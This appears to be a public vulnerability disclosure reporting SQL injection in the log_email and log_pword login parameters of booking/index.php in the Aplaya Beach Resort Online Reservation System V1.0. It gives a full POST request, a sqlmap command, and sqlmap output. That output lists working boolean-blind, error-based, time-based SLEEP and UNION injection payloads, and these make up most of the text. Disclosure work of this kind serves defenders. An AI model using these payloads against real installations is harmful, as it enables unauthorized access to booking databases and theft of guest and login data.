Aplaya Beach Resort Online Reservation System - SQL Injection on (booking/index.php log_email/log_pword parameters) 

Author:Qianyongcun

Vendor Homepage:
https://www.sourcecodester.com/aplaya-beach-resort-online-reservation-system.html 

Version:V1.0
Tested on: PHP, Apache, MySQL

Affected Page:
booking/index.php 
On this page, log_email/log_pword parameters are vulnerable to SQL Injection Attack 

Proof of vulnerability(Verify using the sqlmap tool after logining ):
Requests:
POST /aplaya/booking/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 73
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=g883r0l08f296hfd9582abk9v0
Origin: http://localhost
Referer: http://localhost/aplaya/booking/index.php
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip

log_email=1&log_pword=1&login=

-> sqlmap -r 1.txt(above request package) --batch

Output:

---
Parameter: log_email (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: log_email=1' RLIKE (SELECT (CASE WHEN (8624=8624) THEN 1 ELSE 0x28 END))-- wVbk&log_pword=admin&login=

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: log_email=1' OR (SELECT 6987 FROM(SELECT COUNT(*),CONCAT(0x7171786b71,(SELECT (ELT(6987=6987,1))),0x71766b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- FdCM&log_pword=admin&login=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: log_email=1' AND (SELECT 1498 FROM (SELECT(SLEEP(5)))YKXY)-- uAxn&log_pword=admin&login=
---
---
Parameter: log_pword (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: log_email=1&log_pword=admin' RLIKE (SELECT (CASE WHEN (7923=7923) THEN 0x61646d696e ELSE 0x28 END))-- tLrd&login=

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: log_email=1&log_pword=admin' OR (SELECT 4986 FROM(SELECT COUNT(*),CONCAT(0x7171786b71,(SELECT (ELT(4986=4986,1))),0x71766b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- RNBg&login=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: log_email=1&log_pword=admin' AND (SELECT 4629 FROM (SELECT(SLEEP(5)))Mkwy)-- HrOF&login=

    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: log_email=1&log_pword=admin' UNION ALL SELECT 62,CONCAT(0x7171786b71,0x4f6d66624a6e684f575756674c6347434d796c646442726d6b6a567a78515941417858784f74634c,0x71766b6271),62,62,62,62,62,62,62,62#&login=
---
